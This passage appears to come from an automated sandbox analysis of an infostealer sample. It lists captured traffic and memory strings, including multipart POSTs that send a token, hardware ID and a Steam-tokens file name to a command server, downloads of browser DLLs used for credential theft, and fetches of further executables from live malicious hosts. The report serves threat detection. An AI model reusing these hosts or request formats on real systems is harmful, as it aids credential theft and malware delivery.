Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="file"------IJKJDAFHJDHIEBGCFIDB--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGIDHost: 185.172.128.76Content-Length: 129011Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="message"her7h48r------DAKEBAKFHCFHIEBFBAFB--
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache

Source: Joe Sandbox View	IP Address: 185.172.128.90 185.172.128.90
Source: Joe Sandbox View	IP Address: 185.172.128.228 185.172.128.228

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=five HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic	HTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Code function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,

0_2_0042676C

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Apr 2024 06:48:51 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec

Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=five HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: note.padd.cn.com
Source: global traffic	DNS traffic detected: DNS query: svc.iolo.com
Source: global traffic	DNS traffic detected: DNS query: download.iolo.net
Source: global traffic	DNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com

Source: unknown

HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 38 37 35 41 31 36 36 42 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="hwid"79875A166BA11720009369------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="build"default10------IJKJDAFHJDHIEBGCFIDB--

Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe00
Source: u42w.0.exe, 00000001.00000002.2112134672.00000000292B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exeq
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll5
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dllUK
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dllI
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll9
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll3
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php639c1ec5fdf4178fa648df7975496release92036e868a3837ab3d0e58
Source: u42w.0.exe, 00000001.00000002.2112134672.00000000292B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 